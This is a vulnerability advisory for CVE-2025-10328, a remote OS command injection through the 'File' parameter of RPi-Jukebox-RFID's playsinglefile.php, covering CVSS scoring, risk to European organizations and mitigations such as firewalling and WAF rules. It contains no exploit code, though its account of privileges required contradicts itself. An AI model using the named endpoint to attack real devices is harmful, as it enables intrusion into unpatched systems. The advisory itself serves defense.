CVE-2025-10328 is a security vulnerability identified in the MiczFlor RPi-Jukebox-RFID software, specifically affecting versions up to 2.8.0. The vulnerability exists in the /htdocs/api/playlist/playsinglefile.php file, where improper handling of the 'File' argument allows an attacker to perform OS command injection. This means that an attacker can manipulate the input to execute arbitrary operating system commands on the underlying device running the vulnerable software. The attack vector is remote, requiring no user interaction or authentication, which significantly increases the risk of exploitation. The vulnerability has been publicly disclosed, but the vendor has not responded or provided a patch at the time of disclosure. The CVSS 4.0 base score is 5.3, indicating a medium severity level. The vector details show that the attack can be performed over the network (AV:N), requires low attack complexity (AC:L), no privileges (PR:L) but some level of privilege is needed (PR:L indicates low privileges, possibly a user-level account), no user interaction (UI:N), and impacts confidentiality, integrity, and availability to a low extent (VC:L, VI:L, VA:L). The scope is unchanged (S:N), and the exploitability is partially functional (E:P). This vulnerability is particularly concerning for deployments of RPi-Jukebox-RFID on Raspberry Pi devices, commonly used for media playback with RFID control, often in home, educational, or small business environments. The lack of vendor response and patch availability increases the window of exposure for affected users.

For European organizations, the impact of this vulnerability depends on the extent to which RPi-Jukebox-RFID is deployed within their environments. While the product is niche and primarily used for media playback controlled by RFID, it may be present in educational institutions, libraries, museums, or small businesses that utilize Raspberry Pi devices for interactive audio systems. Successful exploitation could allow attackers to execute arbitrary commands on the device, potentially leading to unauthorized access to local network resources, data leakage, or pivoting to other systems. Although the vulnerability’s CVSS score is medium, the ease of remote exploitation without user interaction or authentication raises concerns, especially in environments where network segmentation is weak. The impact on confidentiality, integrity, and availability is low but non-negligible, as attackers could disrupt media services or use the compromised device as a foothold for further attacks. Given that the vendor has not issued a patch, organizations face increased risk until mitigations or updates are applied. The threat is more significant in environments where these devices are connected to critical networks or contain sensitive data, or where the devices are accessible from untrusted networks.

Since no official patch is available, European organizations should implement specific mitigations to reduce risk. First, restrict network access to RPi-Jukebox-RFID devices by placing them behind firewalls or VLANs that limit exposure to trusted users and systems only. Disable or restrict remote access to the vulnerable API endpoint (/htdocs/api/playlist/playsinglefile.php) using web application firewalls (WAFs) or reverse proxies with filtering rules that block suspicious input patterns targeting the 'File' parameter. Employ network monitoring and intrusion detection systems (IDS) to detect anomalous command injection attempts. If possible, replace or upgrade to a newer version of the software once a patch is released. As an interim measure, consider disabling the vulnerable functionality if it is not essential. Additionally, enforce the principle of least privilege on the Raspberry Pi devices, ensuring that the user context running the RPi-Jukebox-RFID service has minimal permissions to limit the impact of any successful exploitation. Regularly audit and monitor logs for signs of exploitation attempts. Finally, educate users and administrators about the risks and encourage timely updates once a patch becomes available.